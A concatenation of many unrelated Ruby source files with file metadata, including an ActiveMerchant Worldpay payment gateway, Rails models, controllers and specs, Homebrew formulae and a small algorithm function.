date_of_birth: "dateOfBirth",
gender: "gender",
company_name: "companyName",
registered_office: "registeredOffice",
fiscal_number: "fiscalNumber",
iva_code: "ivaCode",
id_card: "idCard",
mobile_phone: "mobilePhone",
email: "email",
address: "address",
digital_address: "digitalAddress"
}.freeze
ATTRIBUTES = ATTRIBUTES_MAP.keys.freeze
class << self
attr_writer :configuration
end
def self.configuration
@configuration ||= Configuration.new
end
def self.reset_configuration!
@configuration = Configuration.new
end
def self.configure
yield configuration
end
end
| 26.078261 | 79 | 0.718906 |
ed29b26a540b44c5781ce7ac4680a5798f108ee3 | 1,404 | module I18n
module Sync
# Main class
class Work
attr_accessor :master, :debug
def initialize(master, opts = {})
@master = YamlFile.new(master)
say "Start work on #{master}"
end
def self.sync_dir(path, master, opts = {})
path ||= DEFAULT_LOCALE
fail "Path doesn't exist '#{path}'" unless File.exist?(path)
Dir["#{path}/**"].map do |file|
next unless file =~ /(^|\.)#{master}\./
new(file, opts)
end
end
def sync
master.siblings.each do |file|
say "Syncing #{file}"
other = YamlFile.new(file)
other.sync!(master)
other.write!
end
end
def add_key(key, value)
# Walk (and create) the nested hashes for a dotted key, then store the value.
segments = key.split('.')
leaf = segments.pop
node = segments.inject(master.data) { |data, segment| data[segment] ||= {} }
node[leaf] = value
end
def create_new_files
@new_ones.each do |name|
say "Creating new file #{name}"
create name
end
end
def create(newlang)
# New name "app.en.yml" -> "app.pt.yml", "en.yml" -> "pt.yml"
newname = @file.gsub(/(^|\.)#{@lang}\./, "\\1#{newlang}.")
fullpath = "#{@path}/#{newname}"
return puts('File exists.') if File.exist?(fullpath)
write_file(fullpath, newlang, @comments, @words)
end
def say(txt)
puts txt # if debug
end
end
end
end
| 24.631579 | 70 | 0.510684 |
edb00c261187ac7474ca31d7963a6727391aafda | 1,660 | require 'rails_helper'
describe 'leagues/matches/index' do
let(:div) { build(:league_division) }
let(:home_team) { build_stubbed(:league_roster) }
let(:away_team) { build_stubbed(:league_roster) }
before do
@matches = []
@matches << build_stubbed(:league_match, home_team: home_team,
away_team: away_team, status: 'confirmed')
@matches << build_stubbed(:league_match, home_team: home_team, away_team: away_team,
status: 'pending', round_name: 'Finals')
@matches << build_stubbed(:bye_league_match, home_team: home_team, status: 'confirmed')
League::Match.forfeit_bies.each_key do |ff|
@matches << build_stubbed(:league_match, home_team: home_team, away_team: away_team,
forfeit_by: ff, status: 'confirmed')
end
rounds = []
rounds << build_stubbed(:league_match_round, home_team_score: 2, away_team_score: 1)
rounds << build_stubbed(:league_match_round, home_team_score: 1, away_team_score: 2)
rounds << build_stubbed(:league_match_round, home_team_score: 3, away_team_score: 3)
@matches.each do |match|
allow(match).to receive(:rounds).and_return(rounds)
end
end
it 'displays matches' do
allow(view).to receive(:user_can_edit_league?).and_return(true)
assign(:league, div.league)
assign(:divisions, [div])
assign(:matches, div => @matches)
render
@matches.each do |match|
expect(rendered).to include(match.home_team.name)
expect(rendered).to include(match.away_team.name) if match.away_team
end
end
end
| 38.604651 | 91 | 0.656024 |
1d29285cd76f4a849df38523a56da784e40c2aa2 | 388 | ActiveRecord::QueryMethods.module_eval do
def bind_parameters(opts)
binds = []
opts.each do |(column, value)|
if(value.nil?)
raise ArgumentError.new("nils are not allowed in bind parameter. please sanitize value for column: '#{column}'")
end
binds.push [@klass.columns_hash[column.to_s], value]
end
self.bind_values += binds
self
end
end
| 27.714286 | 120 | 0.667526 |
edce0ceeb056ef3668296d7942a77e9597ce16a9 | 1,310 | require 'renewable/version'
module Renewable
def initialize(attributes = {}, options = {})
attributes, options = process_arguments(attributes.dup, options.dup)
renewable_process_attributes(attributes)
renewable_process_options(options)
attributes, options = before_freeze(attributes, options)
self.freeze
after_freeze(attributes, options)
end
def renew(attributes = {}, options = {})
merged_attributes = self.renewable_attributes.merge(attributes)
merged_options = self.renewable_options.merge(options)
self.class.new(merged_attributes, merged_options)
end
protected
def renewable_attributes
@renewable_attributes
end
def renewable_options
@renewable_options
end
private
def process_arguments(attributes, options)
return attributes, options
end
def renewable_process_attributes(attributes)
attributes.each do |name, value|
self.instance_variable_set(:"@#{name}", value)
end
@renewable_attributes = attributes
end
def renewable_process_options(options)
@renewable_options = options
end
def before_freeze(attributes, options)
return attributes, options
end
def after_freeze(attributes, options)
return attributes, options
end
end
class Renewable::Object
include ::Renewable
end
| 21.833333 | 72 | 0.748092 |
d5eef7d266c81d95e3540488122b2eac8e767b85 | 4,386 | class Internetarchive < Formula
include Language::Python::Virtualenv
desc "Python wrapper for the various Internet Archive APIs"
homepage "https://github.com/jjjake/internetarchive"
url "https://files.pythonhosted.org/packages/9f/30/edd23ef4968ac86f587ec7d152887e8005ee9ca7e058fe2c90c38157274e/internetarchive-2.1.0.tar.gz"
sha256 "72094f05df39bb1463f61f928f3a7fa0dd236cab185cb8b7e8eb6c85e09acdc4"
license "AGPL-3.0-or-later"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "86c1ea4cd264073a6ff29d9c9be67707feefa99f756bdad5c8ff1c5998e29834"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "efd1f32bcd50639dcae68284c1f9341fd5dd3954864f950187bb51ee8ff3066a"
sha256 cellar: :any_skip_relocation, monterey: "3c4434db045fc01960fa40d8f8e5c8868100b07dabaddf021157c88cbc855e45"
sha256 cellar: :any_skip_relocation, big_sur: "fb46971f8737f8df3fd581d34165a485655daa35677d7b2d23ed8a98ca518be3"
sha256 cellar: :any_skip_relocation, catalina: "3452cddfc926f50ab193f97d008f13aa8857f42688bf829994eb80521b84ed8e"
sha256 cellar: :any_skip_relocation, mojave: "34976cd4bc110ba7043355db9d70e78d36863cdab96023dd87c096fa33b60f7c"
sha256 cellar: :any_skip_relocation, x86_64_linux: "ed7f2477545d884241f11c6ebb2a6f7be9a01d7f419c9c29237d79418554cc83"
end
depends_on "[email protected]"
depends_on "six"
resource "certifi" do
url "https://files.pythonhosted.org/packages/6d/78/f8db8d57f520a54f0b8a438319c342c61c22759d8f9a1cd2e2180b5e5ea9/certifi-2021.5.30.tar.gz"
sha256 "2bbf76fd432960138b3ef6dda3dde0544f27cbf8546c458e60baf371917ba9ee"
end
resource "charset-normalizer" do
url "https://files.pythonhosted.org/packages/e7/4e/2af0238001648ded297fb54ceb425ca26faa15b341b4fac5371d3938666e/charset-normalizer-2.0.4.tar.gz"
sha256 "f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3"
end
resource "contextlib2" do
url "https://files.pythonhosted.org/packages/c7/13/37ea7805ae3057992e96ecb1cffa2fa35c2ef4498543b846f90dd2348d8f/contextlib2-21.6.0.tar.gz"
sha256 "ab1e2bfe1d01d968e1b7e8d9023bc51ef3509bba217bb730cee3827e1ee82869"
end
resource "docopt" do
url "https://files.pythonhosted.org/packages/a2/55/8f8cab2afd404cf578136ef2cc5dfb50baa1761b68c9da1fb1e4eed343c9/docopt-0.6.2.tar.gz"
sha256 "49b3a825280bd66b3aa83585ef59c4a8c82f2c8a522dbe754a8bc8d08c85c491"
end
resource "idna" do
url "https://files.pythonhosted.org/packages/cb/38/4c4d00ddfa48abe616d7e572e02a04273603db446975ab46bbcd36552005/idna-3.2.tar.gz"
sha256 "467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3"
end
resource "jsonpatch" do
url "https://files.pythonhosted.org/packages/21/67/83452af2a6db7c4596d1e2ecaa841b9a900980103013b867f2865e5e1cf0/jsonpatch-1.32.tar.gz"
sha256 "b6ddfe6c3db30d81a96aaeceb6baf916094ffa23d7dd5fa2c13e13f8b6e600c2"
end
resource "jsonpointer" do
url "https://files.pythonhosted.org/packages/6b/35/400557d3df63269a4c010cbd4865910b3c1718fbfe8d83210b216cd3efcf/jsonpointer-2.1.tar.gz"
sha256 "5a34b698db1eb79ceac454159d3f7c12a451a91f6334a4f638454327b7a89962"
end
resource "requests" do
url "https://files.pythonhosted.org/packages/e7/01/3569e0b535fb2e4a6c384bdbed00c55b9d78b5084e0fb7f4d0bf523d7670/requests-2.26.0.tar.gz"
sha256 "b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7"
end
resource "schema" do
url "https://files.pythonhosted.org/packages/2b/91/42bc143289fd5f032ab1b01c5da32dc162ae808a585122f27ed5bf67268f/schema-0.7.4.tar.gz"
sha256 "fbb6a52eb2d9facf292f233adcc6008cffd94343c63ccac9a1cb1f3e6de1db17"
end
resource "tqdm" do
url "https://files.pythonhosted.org/packages/37/e5/1b54ef934d731576d0145bc8ae22da5b410f96922cec52b91cc29d3ff1b6/tqdm-4.62.2.tar.gz"
sha256 "a4d6d112e507ef98513ac119ead1159d286deab17dffedd96921412c2d236ff5"
end
resource "urllib3" do
url "https://files.pythonhosted.org/packages/4f/5a/597ef5911cb8919efe4d86206aa8b2658616d676a7088f0825ca08bd7cb8/urllib3-1.26.6.tar.gz"
sha256 "f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f"
end
def install
virtualenv_install_with_resources
bin.install_symlink libexec/"bin/ia"
end
test do
metadata = JSON.parse shell_output("#{bin}/ia metadata tigerbrew")
assert_equal metadata["metadata"]["uploader"], "[email protected]"
end
end
| 49.840909 | 148 | 0.824897 |
1ca0ae196b8623c424d21c3a4497568c77845736 | 781 | require "active_record"
require "active_record/relation"
require "active_record/relation/query_methods.rb"
module ActiveRecord::QueryMethods
def structurally_incompatible_values_for_or(other)
(ActiveRecord::Relation::SINGLE_VALUE_METHODS - [:distinct]).reject { |m| send("#{m}_value") == other.send("#{m}_value") } +
(ActiveRecord::Relation::MULTI_VALUE_METHODS - [:eager_load, :left_outer_joins, :joins, :references, :order, :extending]).reject { |m| send("#{m}_values") == other.send("#{m}_values") } +
      (ActiveRecord::Relation::CLAUSE_METHODS - [:having, :where]).reject { |m| send("#{m}_clause") == other.send("#{m}_clause") }
  end
end
class Object
  def to_query(key = nil)
    "#{URI.encode(key.to_param)}=#{URI.encode(to_param.to_s)}"
  end
end
| 55.785714 | 196 | 0.693982 |
6aa7cf47f911d6a854d6e2b25b951dd4d402700d | 282 | $LOAD_PATH.unshift(File.dirname(__FILE__))
require 'config/application'
use Rack::Cors do
allow do
origins '*'
resource '*', headers: :any, methods: [:get, :post, :put, :delete, :options]
end
end
use OTR::ActiveRecord::ConnectionManagement
run GrapeOAuth2Sample::API
| 20.142857 | 80 | 0.712766 |
5d4951a145a14b5ede66887504d527cd12be2ccd | 2,600 | # A sweep represents a batch of Snapshots that were triggered simultaneously,
# such as after a deploy.
class Sweep < ActiveRecord::Base
belongs_to :project
has_many :snapshots
attr_accessor :delay_seconds
validates :title, presence: true
validates :email, format: { with: /\A.+@.+\Z/ },
allow_nil: true,
allow_blank: true
after_create :take_snapshots,
:refresh_project_last_sweep
before_create :set_start_time_from_delay_seconds
after_destroy :refresh_project_last_sweep
default_scope { order('created_at DESC') }
def delay_seconds_remaining
return nil unless start_time
return nil if start_time < Time.now
(start_time - Time.now).round
end
def pending_snapshots
snapshots.select(&:pending?)
end
def accepted_snapshots
snapshots.select(&:accepted?)
end
def rejected_snapshots
snapshots.select(&:rejected?)
end
def under_review_snapshots
snapshots.select(&:under_review?)
end
# Updates the snapshot counters and sends out an email if the sweep reaches a
# "done" state. This method is using a pessimistic locking approach to avoid
# race conditions that can cause duplicate emails to be sent and/or the
# progress counters to be stale.
#
# @see
# http://api.rubyonrails.org/classes/ActiveRecord/Locking/Pessimistic.html
# for more info on pessimistic locking.
#
# @return [Sweep] returns itself (useful for method chaining)
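#
# @example Hypothetical call site (not taken from this codebase)
#   snapshot.sweep.refresh! # recounts snapshots and emails once review is done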
def refresh!
with_lock do
update_counters!
send_email_if_needed!
save!
end
self # for chaining
end
private
def update_counters!
self.count_pending = pending_snapshots.count
self.count_accepted = accepted_snapshots.count
self.count_rejected = rejected_snapshots.count
self.count_under_review = under_review_snapshots.count
end
def send_email_if_needed!
return if email.blank?
return if snapshots.count == 0
return if count_pending > 0
return if emailed_at
SweepMailer.ready_for_review(self).deliver
self.emailed_at = Time.now
end
def take_snapshots
if start_time
SweepWorker.perform_at(start_time, id)
else
SweepWorker.new.perform_with_sweep(self)
end
end
def refresh_project_last_sweep
project.refresh_last_sweep!
end
def set_start_time_from_delay_seconds
return unless delay_seconds.to_i > 0
self.start_time = Time.now + delay_seconds.to_i.seconds
end
end
| 27.659574 | 79 | 0.688077 |
018397910031a7830c455849c54419e672138b78 | 659 | require "#{Rails.root}/lib/ghauth"
class GhauthController < ApplicationController
rescue_from OAuth::Unauthorized, :with => Proc.new { redirect_to '/' }
def sign_in
redirect_to GhAuth.oauth.authorize_url(client_id: GhAuth.config['client_id'], scope: 'user:email')
end
def callback
token = GhAuth.oauth.auth_code.get_token(params[:code])
logger.error token
logger.error token.token
user = GhUser.auth(token.token)
session[:authorized_user_id] = user.id
flash[:notice] = nil
redirect_to :home
rescue => e
logger.error e.inspect
flash[:notice] = I18n.t(:failed_facebook_login)
redirect_to '/'
end
end
| 27.458333 | 102 | 0.705615 |
266ee7929043839c82003639b4087f194f40eeac | 880 | # rubocop:disable Metrics/LineLength
# == Schema Information
#
# Table name: notification_settings
#
# id :integer not null, primary key
# email_enabled :boolean default(TRUE)
# fb_messenger_enabled :boolean default(TRUE)
# mobile_enabled :boolean default(TRUE)
# setting_type :integer not null
# web_enabled :boolean default(TRUE)
# created_at :datetime not null
# updated_at :datetime not null
# user_id :integer not null, indexed
#
# Indexes
#
# index_notification_settings_on_user_id (user_id)
#
# Foreign Keys
#
# fk_rails_0c95e91db7 (user_id => users.id)
#
# rubocop:enable Metrics/LineLength
FactoryBot.define do
factory :notification_setting do
user
setting_type { rand(0..4) }
end
end
| 27.5 | 63 | 0.6125 |
aca906ae7f473370c9378f0abdecc3bc221f17f5 | 16,185 | module ActiveMerchant #:nodoc:
module Billing #:nodoc:
class WorldpayGateway < Gateway
self.test_url = 'https://secure-test.worldpay.com/jsp/merchant/xml/paymentService.jsp'
self.live_url = 'https://secure.worldpay.com/jsp/merchant/xml/paymentService.jsp'
self.default_currency = 'GBP'
self.money_format = :cents
self.supported_countries = %w(HK GB AU AD AR BE BR CA CH CN CO CR CY CZ DE DK ES FI FR GI GR HU IE IN IT JP LI LU MC MT MY MX NL NO NZ PA PE PL PT SE SG SI SM TR UM VA)
self.supported_cardtypes = [:visa, :master, :american_express, :discover, :jcb, :maestro]
self.currencies_without_fractions = %w(HUF IDR ISK JPY KRW)
self.currencies_with_three_decimal_places = %w(BHD KWD OMR RSD TND)
self.homepage_url = 'http://www.worldpay.com/'
self.display_name = 'Worldpay Global'
CARD_CODES = {
'visa' => 'VISA-SSL',
'master' => 'ECMC-SSL',
'discover' => 'DISCOVER-SSL',
'american_express' => 'AMEX-SSL',
'jcb' => 'JCB-SSL',
'maestro' => 'MAESTRO-SSL',
'diners_club' => 'DINERS-SSL',
}
def initialize(options = {})
requires!(options, :login, :password)
super
end
def purchase(money, payment_method, options = {})
MultiResponse.run do |r|
r.process { authorize(money, payment_method, options) }
r.process { capture(money, r.authorization, options.merge(:authorization_validated => true)) }
end
end
def authorize(money, payment_method, options = {})
requires!(options, :order_id)
authorize_request(money, payment_method, options)
end
def capture(money, authorization, options = {})
MultiResponse.run do |r|
r.process { inquire_request(authorization, options, 'AUTHORISED') } unless options[:authorization_validated]
if r.params
authorization_currency = r.params['amount_currency_code']
options = options.merge(:currency => authorization_currency) if authorization_currency.present?
end
r.process { capture_request(money, authorization, options) }
end
end
def void(authorization, options = {})
MultiResponse.run do |r|
r.process { inquire_request(authorization, options, 'AUTHORISED') } unless options[:authorization_validated]
r.process { cancel_request(authorization, options) }
end
end
def refund(money, authorization, options = {})
response = MultiResponse.run do |r|
r.process { inquire_request(authorization, options, 'CAPTURED', 'SETTLED', 'SETTLED_BY_MERCHANT') }
r.process { refund_request(money, authorization, options) }
end
return response if response.success?
return response unless options[:force_full_refund_if_unsettled]
void(authorization, options) if response.params['last_event'] == 'AUTHORISED'
end
# Credits only function on a Merchant ID/login/profile flagged for Payouts
# aka Credit Fund Transfers (CFT), whereas normal purchases, refunds,
# and other transactions should be performed on a normal eCom-flagged
# merchant ID.
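# A minimal sketch of a payout call, assuming a CFT-enabled merchant profile;
# the login, password, amount and card object below are placeholders rather
# than values taken from this gateway:
#
#   payout_gateway = ActiveMerchant::Billing::WorldpayGateway.new(login: 'CFT_MERCHANT_CODE', password: 'secret')
#   payout_gateway.credit(10_00, credit_card, order_id: 'payout-42')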
def credit(money, payment_method, options = {})
credit_request(money, payment_method, options.merge(:credit => true))
end
def verify(credit_card, options={})
MultiResponse.run(:use_first_response) do |r|
r.process { authorize(100, credit_card, options) }
r.process(:ignore_result) { void(r.authorization, options.merge(:authorization_validated => true)) }
end
end
def supports_scrubbing
true
end
def scrub(transcript)
transcript.
gsub(%r((Authorization: Basic )\w+), '\1[FILTERED]').
gsub(%r((<cardNumber>)\d+(</cardNumber>)), '\1[FILTERED]\2').
gsub(%r((<cvc>)[^<]+(</cvc>)), '\1[FILTERED]\2')
end
private
def authorize_request(money, payment_method, options)
commit('authorize', build_authorization_request(money, payment_method, options), 'AUTHORISED', options)
end
def capture_request(money, authorization, options)
commit('capture', build_capture_request(money, authorization, options), :ok, options)
end
def cancel_request(authorization, options)
commit('cancel', build_void_request(authorization, options), :ok, options)
end
def inquire_request(authorization, options, *success_criteria)
commit('inquiry', build_order_inquiry_request(authorization, options), *success_criteria, options)
end
def refund_request(money, authorization, options)
commit('refund', build_refund_request(money, authorization, options), :ok, options)
end
def credit_request(money, payment_method, options)
commit('credit', build_authorization_request(money, payment_method, options), :ok, 'SENT_FOR_REFUND', options)
end
def build_request
xml = Builder::XmlMarkup.new :indent => 2
xml.instruct! :xml, :encoding => 'UTF-8'
xml.declare! :DOCTYPE, :paymentService, :PUBLIC, '-//WorldPay//DTD WorldPay PaymentService v1//EN', 'http://dtd.worldpay.com/paymentService_v1.dtd'
xml.tag! 'paymentService', 'version' => '1.4', 'merchantCode' => @options[:login] do
yield xml
end
xml.target!
end
def build_order_modify_request(authorization)
build_request do |xml|
xml.tag! 'modify' do
xml.tag! 'orderModification', 'orderCode' => authorization do
yield xml
end
end
end
end
def build_order_inquiry_request(authorization, options)
build_request do |xml|
xml.tag! 'inquiry' do
xml.tag! 'orderInquiry', 'orderCode' => authorization
end
end
end
def build_authorization_request(money, payment_method, options)
build_request do |xml|
xml.tag! 'submit' do
xml.tag! 'order', order_tag_attributes(options) do
xml.description(options[:description].blank? ? 'Purchase' : options[:description])
add_amount(xml, money, options)
if options[:order_content]
xml.tag! 'orderContent' do
xml.cdata! options[:order_content]
end
end
add_payment_method(xml, money, payment_method, options)
add_email(xml, options)
if options[:hcg_additional_data]
add_hcg_additional_data(xml, options)
end
if options[:instalments]
add_instalments_data(xml, options)
end
end
end
end
end
def order_tag_attributes(options)
{ 'orderCode' => options[:order_id], 'installationId' => options[:inst_id] || @options[:inst_id] }.reject { |_, v| !v }
end
def build_capture_request(money, authorization, options)
build_order_modify_request(authorization) do |xml|
xml.tag! 'capture' do
time = Time.now
xml.tag! 'date', 'dayOfMonth' => time.day, 'month' => time.month, 'year'=> time.year
add_amount(xml, money, options)
end
end
end
def build_void_request(authorization, options)
build_order_modify_request(authorization) do |xml|
xml.tag! 'cancel'
end
end
def build_refund_request(money, authorization, options)
build_order_modify_request(authorization) do |xml|
xml.tag! 'refund' do
add_amount(xml, money, options.merge(:debit_credit_indicator => 'credit'))
end
end
end
def add_amount(xml, money, options)
currency = options[:currency] || currency(money)
amount_hash = {
:value => localized_amount(money, currency),
'currencyCode' => currency,
'exponent' => currency_exponent(currency)
}
if options[:debit_credit_indicator]
amount_hash['debitCreditIndicator'] = options[:debit_credit_indicator]
end
xml.tag! 'amount', amount_hash
end
def add_payment_method(xml, amount, payment_method, options)
if payment_method.is_a?(String)
if options[:merchant_code]
xml.tag! 'payAsOrder', 'orderCode' => payment_method, 'merchantCode' => options[:merchant_code] do
add_amount(xml, amount, options)
end
else
xml.tag! 'payAsOrder', 'orderCode' => payment_method do
add_amount(xml, amount, options)
end
end
else
xml.tag! 'paymentDetails', credit_fund_transfer_attribute(options) do
xml.tag! CARD_CODES[card_brand(payment_method)] do
xml.tag! 'cardNumber', payment_method.number
xml.tag! 'expiryDate' do
xml.tag! 'date', 'month' => format(payment_method.month, :two_digits), 'year' => format(payment_method.year, :four_digits)
end
xml.tag! 'cardHolderName', options[:execute_threed] ? '3D' : payment_method.name
xml.tag! 'cvc', payment_method.verification_value
add_address(xml, (options[:billing_address] || options[:address]))
end
if options[:ip] && options[:session_id]
xml.tag! 'session', 'shopperIPAddress' => options[:ip], 'id' => options[:session_id]
else
xml.tag! 'session', 'shopperIPAddress' => options[:ip] if options[:ip]
xml.tag! 'session', 'id' => options[:session_id] if options[:session_id]
end
add_stored_credential_options(xml, options) if options[:stored_credential_usage]
end
end
end
def add_stored_credential_options(xml, options={})
if options[:stored_credential_initiated_reason]
xml.tag! 'storedCredentials', 'usage' => options[:stored_credential_usage], 'merchantInitiatedReason' => options[:stored_credential_initiated_reason] do
xml.tag! 'schemeTransactionIdentifier', options[:stored_credential_transaction_id] if options[:stored_credential_transaction_id]
end
else
xml.tag! 'storedCredentials', 'usage' => options[:stored_credential_usage]
end
end
def add_email(xml, options)
return unless options[:execute_threed] || options[:email]
xml.tag! 'shopper' do
xml.tag! 'shopperEmailAddress', options[:email] if options[:email]
xml.tag! 'browser' do
xml.tag! 'acceptHeader', options[:accept_header]
xml.tag! 'userAgentHeader', options[:user_agent]
end
end
end
def add_address(xml, address)
return unless address
address = address_with_defaults(address)
xml.tag! 'cardAddress' do
xml.tag! 'address' do
if m = /^\s*([^\s]+)\s+(.+)$/.match(address[:name])
xml.tag! 'firstName', m[1]
xml.tag! 'lastName', m[2]
end
xml.tag! 'address1', address[:address1]
xml.tag! 'address2', address[:address2] if address[:address2]
xml.tag! 'postalCode', address[:zip]
xml.tag! 'city', address[:city]
xml.tag! 'state', address[:state]
xml.tag! 'countryCode', address[:country]
xml.tag! 'telephoneNumber', address[:phone] if address[:phone]
end
end
end
def add_hcg_additional_data(xml, options)
xml.tag! 'hcgAdditionalData' do
options[:hcg_additional_data].each do |k, v|
xml.tag! 'param', {name: k.to_s}, v
end
end
end
def add_instalments_data(xml, options)
xml.tag! 'thirdPartyData' do
xml.tag! 'instalments', options[:instalments]
xml.tag! 'cpf', options[:cpf] if options[:cpf]
end
end
def address_with_defaults(address)
address ||= {}
address.delete_if { |_, v| v.blank? }
address.reverse_merge!(default_address)
end
def default_address
{
address1: 'N/A',
zip: '0000',
city: 'N/A',
state: 'N/A',
country: 'US'
}
end
def parse(action, xml)
parse_element({:action => action}, REXML::Document.new(xml))
end
def parse_element(raw, node)
node.attributes.each do |k, v|
raw["#{node.name.underscore}_#{k.underscore}".to_sym] = v
end
if node.has_elements?
raw[node.name.underscore.to_sym] = true unless node.name.blank?
node.elements.each { |e| parse_element(raw, e) }
else
raw[node.name.underscore.to_sym] = node.text unless node.text.nil?
end
raw
end
def headers(options)
headers = {
'Content-Type' => 'text/xml',
'Authorization' => encoded_credentials
}
if options[:cookie]
headers['Set-Cookie'] = options[:cookie] if options[:cookie]
end
headers
end
def commit(action, request, *success_criteria, options)
xml = ssl_post(url, request, headers(options))
raw = parse(action, xml)
if options[:execute_threed]
raw[:cookie] = @cookie
raw[:session_id] = options[:session_id]
end
success, message = success_and_message_from(raw, success_criteria)
Response.new(
success,
message,
raw,
:authorization => authorization_from(raw),
:error_code => error_code_from(success, raw),
:test => test?)
rescue ActiveMerchant::ResponseError => e
if e.response.code.to_s == '401'
return Response.new(false, 'Invalid credentials', {}, :test => test?)
else
raise e
end
end
def url
test? ? self.test_url : self.live_url
end
# Override the regular handle response so we can access the headers
# Set-Cookie value is needed for 3DS transactions
def handle_response(response)
case response.code.to_i
when 200...300
@cookie = response['Set-Cookie']
response.body
else
raise ResponseError.new(response)
end
end
      # success_criteria can be:
      # - a single status string that the transaction must reach, or
      # - an array of strings, if any one of several statuses should be
      #   considered a success.
def success_and_message_from(raw, success_criteria)
success = (success_criteria.include?(raw[:last_event]) || raw[:ok].present?)
if success
message = 'SUCCESS'
else
message = (raw[:iso8583_return_code_description] || raw[:error] || required_status_message(raw, success_criteria))
end
[ success, message ]
end
def error_code_from(success, raw)
        unless success
raw[:iso8583_return_code_code] || raw[:error_code] || nil
end
end
def required_status_message(raw, success_criteria)
if(!success_criteria.include?(raw[:last_event]))
"A transaction status of #{success_criteria.collect { |c| "'#{c}'" }.join(" or ")} is required."
end
end
def authorization_from(raw)
pair = raw.detect { |k, v| k.to_s =~ /_order_code$/ }
(pair ? pair.last : nil)
end
def credit_fund_transfer_attribute(options)
return unless options[:credit]
{'action' => 'REFUND'}
end
def encoded_credentials
credentials = "#{@options[:login]}:#{@options[:password]}"
"Basic #{[credentials].pack('m').strip}"
end
def currency_exponent(currency)
return 0 if non_fractional_currency?(currency)
return 3 if three_decimal_currency?(currency)
return 2
end
end
end
end
| 36.127232 | 174 | 0.600494 |
f78242da6800413af23d52cd079f35cc42b76afe | 724 |
# Time Complexity: O(n)
# Space Complexity: O(1)
def max_sub_array(nums)
max_so_far = nums[0]
max_ending_here = nums[0]
i = 1
while i < nums.length
max_ending_here = max_ending_here + nums[i]
if max_so_far < max_ending_here
max_so_far = max_ending_here
end
if max_ending_here < 0
max_ending_here = 0
end
i += 1
end
return max_so_far
end
# Initialize:
# max_so_far = 0
# max_ending_here = 0
# Loop for each element of the array
# (a) max_ending_here = max_ending_here + a[i]
# (b) if(max_ending_here < 0)
# max_ending_here = 0
# (c) if(max_so_far < max_ending_here)
# max_so_far = max_ending_here
# return max_so_far | 23.354839 | 49 | 0.633978 |
1dbc25acda7c8fdcaad3f71fe351b03e7d1b78cf | 840 | cask 'adguard' do
version '2.1.3.600'
sha256 '40a56f23f0424c3c8242e9de75871803d2a6f9affcabb9031e57657eebbd6a5b'
url "https://static.adguard.com/mac/release/AdGuard-#{version}.dmg"
appcast 'https://static.adguard.com/mac/adguard-release-appcast.xml'
name 'Adguard'
homepage 'https://adguard.com/'
pkg 'AdGuard.pkg'
uninstall pkgutil: 'com.adguard.mac.adguard-pkg'
zap trash: [
'/Library/Application Support/com.adguard.Adguard',
'~/Library/Application Support/Adguard',
'~/Library/Application Support/com.adguard.Adguard',
'~/Library/Caches/com.adguard.Adguard',
'~/Library/Cookies/com.adguard.Adguard.binarycookies',
'~/Library/Logs/Adguard',
'~/Library/Preferences/com.adguard.Adguard.plist',
]
end
| 35 | 75 | 0.65119 |
1ae9e651d448b8fe23a73de8e8df06c25c8b7434 | 1,895 | require 'spec_helper'
describe "Shipping Methods", :type => :feature do
stub_authorization!
let!(:zone) { create(:global_zone) }
let!(:shipping_method) { create(:shipping_method, :zones => [zone]) }
after do
Capybara.ignore_hidden_elements = true
end
before do
Capybara.ignore_hidden_elements = false
# HACK: To work around no email prompting on check out
allow_any_instance_of(Spree::Order).to receive_messages(:require_email => false)
create(:check_payment_method, :environment => 'test')
visit spree.admin_path
click_link "Settings"
click_link "Shipping Methods"
end
context "show" do
it "should display existing shipping methods" do
within_row(1) do
expect(column_text(1)).to eq(shipping_method.name)
expect(column_text(2)).to eq(zone.name)
expect(column_text(3)).to eq("Flat rate")
expect(column_text(4)).to eq("Both")
end
end
end
context "create" do
it "should be able to create a new shipping method" do
click_link "New Shipping Method"
fill_in "shipping_method_name", :with => "bullock cart"
within("#shipping_method_categories_field") do
check first("input[type='checkbox']")["name"]
end
click_on "Create"
expect(current_path).to eql(spree.edit_admin_shipping_method_path(Spree::ShippingMethod.last))
end
end
# Regression test for #1331
context "update" do
it "can change the calculator", :js => true do
within("#listing_shipping_methods") do
click_icon :edit
end
expect(find(:css, ".calculator-settings-warning")).not_to be_visible
select2_search('Flexible Rate', :from => 'Calculator')
expect(find(:css, ".calculator-settings-warning")).to be_visible
click_button "Update"
expect(page).not_to have_content("Shipping method is not found")
end
end
end
| 29.153846 | 100 | 0.681266 |
d57c07a7d58849f69a37b357c9ed5bfeabd5ffdc | 4,287 | RSpec.describe MetasploitDataModels::Search::Operation::Port::Range, type: :model do
subject(:port_range_operation) {
described_class.new(
value: formatted_value
)
}
let(:formatted_value) {
'1'
}
it { is_expected.to be_a MetasploitDataModels::Search::Operation::Range }
context 'validations' do
before(:example) do
port_range_operation.valid?
end
context 'errors on #value' do
subject(:value_errors) {
port_range_operation.errors[:value]
}
context 'with Range' do
context 'with Integers' do
context 'covered by MetasploitDataModels::Search::Operation::Port::Number::RANGE' do
let(:formatted_value) {
'1-2'
}
it { is_expected.to be_empty }
end
# this can't actually happen because the minimum is 0 and a negative number can't be parsed, but validation
# is there in case @value is set directly.
context 'without Range#begin covered by MetasploitDataModels::Search::Operation::Port::Number::RANGE' do
let(:error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_inclusion',
extreme: :begin,
extreme_value: range_begin,
maximum: MetasploitDataModels::Search::Operation::Port::Number::MAXIMUM,
minimum: MetasploitDataModels::Search::Operation::Port::Number::MINIMUM
)
}
let(:formatted_value) {
nil
}
let(:port_range_operation) {
super().tap { |port_range_operation|
port_range_operation.instance_variable_set(:@value, Range.new(range_begin, range_end))
}
}
let(:range_begin) {
-1
}
let(:range_end) {
1
}
it { is_expected.to include error }
end
context 'without Range#end covered by MetasploitDataModels::Search::Operation::Port::Number::RANGE' do
let(:error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_inclusion',
extreme: :end,
extreme_value: range_end,
maximum: MetasploitDataModels::Search::Operation::Port::Number::MAXIMUM,
